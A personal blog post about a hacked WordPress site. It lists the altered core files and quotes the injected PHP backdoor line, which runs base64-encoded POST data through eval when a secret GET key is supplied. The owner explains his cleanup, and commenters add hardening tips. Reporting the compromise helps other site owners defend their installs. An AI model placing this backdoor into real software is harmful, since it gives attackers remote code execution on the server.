Got Hacked Again
You are invited to have my FREE RSS Feeds or you may Subscribe to me via email for latest information in this website.
Last January WordPress.net.in has injected codes at my Wordpress files in which the following WordPress files has been injected with numbers for SQL
- wp-admin/admin.php
- wp-admin/index.php
- wp-includes/wp-db.php
- wp-includes/pluggable.php
- wp-includes/gettext.php
- wp-includes/default-filters.php
Then again. My site has been hacked, but at this time, it is not completely hacked since I was able to check some wordpress files that has been altered. It can easily be notice if you are using Windows Live Writer. If you are using Windows Live writer and suddenly you encounter ” blog server error-server error-32700 occurred parse error, not well formed “
I saw some string like as follows :
<?php if($_GET['aee8d2759ea2c769']==”e7d557fe37ae8fd6″){ eval(base64_decode($_POST['file'])); exit; } ?>
This string should not be installed on either of the WordPress files mentioned above and needs to be deleted. The easiest method of fixing this one is to replace above mentioned files by the original installation files of WordPress that could be downloaded at their site. It is good that I gave a local copy of those files in my computer. Because that the hacked might happen again.
Again I thank gordon.dewis.ca for his post regarding this matter. further reading result good information from Other site
My main index.php was not yet hacked. I believed the hacking is not yet completed. The next time you see an error from your windows live writer. Check your WordPress Installation files.
I have made To do checklist.
- I need to install .htaccess password , maybe somebody would like to make post in doing so
or I will just have to search via Google.
- Research for more possible security fix for my blog.
- Need to update my plug-ins
It is good that I am using Windows Live Writer. So next time when your Authoring Tools make some problem try to search immediately at Google the problem that it reports. BTW I need to study this article on wordpress codex.
Email This Post
; Filed Under Blogging, Tips and Tricks, Wordpress
|
If you are new here, and you would like be updated on the things happening on this site, Try to Subscribe to my FREE RSS Feeds and Subscribe to me via email |
Next post in category: Do You Need to Provide All Information ? »
« Previous post in category: Link Love # 11 : Gathering Information from the Blogosphere
del.icio.us |Digg it |Furl |ma.gnolia |Maple.nu |Netscape |reddit |Scuttle |Shadows |Simpy |Spurl |StumbleUpon |Wink |Yahoo MyWeb |
Permalink : Got Hacked Again
Comments
One Response to “Got Hacked Again”
1 pingsLinks To This Post
-
How to Blog ? My Top 10 Blogging Tips : Tech At Hand dot Net | Philippine, Blogging, SEO & Tips on
June 9th, 2008 12:26 pm
[...] Make a very strong Password to avoid being Hacked. [...]
Leave a Reply
-
Affiliates
Subscribe to RSS feed
My Journal ( My Wife )Translator
By N2H
Other Topic
-
Adsense
Advertising
Affiliate
Alexa
Apple
Asus
Blog
Blogger
Blogger's Event
Blogging
Boxing
Cellphone
Cheque
Citation
Contest
CPC
CTR
Design
Download
Earnings
Eee
Experiment
Feedburner
Feeds
Filipina
Filipino
Free
Freeware
Gadget
Games
Google
HTC
iPhone
Iphone Application
Keyword
Keywords
Laptop
Lesson Learn
Link
Linking
Links
MAC
Make Money Online
Microsoft
Mobile
Money
Mother
netbook
News
Nokia
Optimization
Pacquiao
PDA
Philippines
Pinoy Blogosphere
PR
Problogging
Project
PSP
Ranking
Ranking System
Results
robots.txt
SEO
SEO Tips
SEO Tools
SERP
Tips
Tools
Travel
Twitter
Updates
Visitors
Wordpress
Yahoo
You know what, I think the reason why your blog is hacked often is because you disclose the plugins that you use on your blog. Wordpress plugins are the ones that makes a blog vulnerable to attacks.
I’m guessing that hackers just searched for a wordpress plugin that has some security issues and landed on your blog.
KarloPinoyBlogero’s last blog post..A Pinoy Term for the Word ‘Blog’?
[Reply]
Thanks for the advice Karlo.. From now on I will not disclose the plug-ins that I am using..
Dexter’s last blog post..LG has introduced Advanced IPS (In-Panel-Switching) the kneading board
[Reply]
remember to chmod the files that you need protected.
snoob’s last blog post..?I really want to earn money online, what should I do??
[Reply]
No problemo!
KarloPinoyBlogero’s last blog post..A Pinoy Term for the Word ‘Blog’?
[Reply]
@ snoob
any instruction on how to do it.
Dexter’s last blog post..LG has introduced Advanced IPS (In-Panel-Switching) the kneading board
[Reply]
@Dexter: Check out the Codex (http://codex.wordpress.org/Hardening_WordPress).
Gordon’s last blog post..Leaping eagle ray kills boater
[Reply]
This is crap!
I have both 2.3.3 and 2.0.11 blogs and they are all getting hacked in this manner.
This has been going on since October 2007 and there have been various new releases since then without this problem being addressed and no input from the authors of wordpress!
That is just bad news all around…
[Reply]
@ V_RocKs
Any success on preventing this hack.. ?
Dexter’s last blog post..LG has introduced Advanced IPS (In-Panel-Switching) the kneading board
[Reply]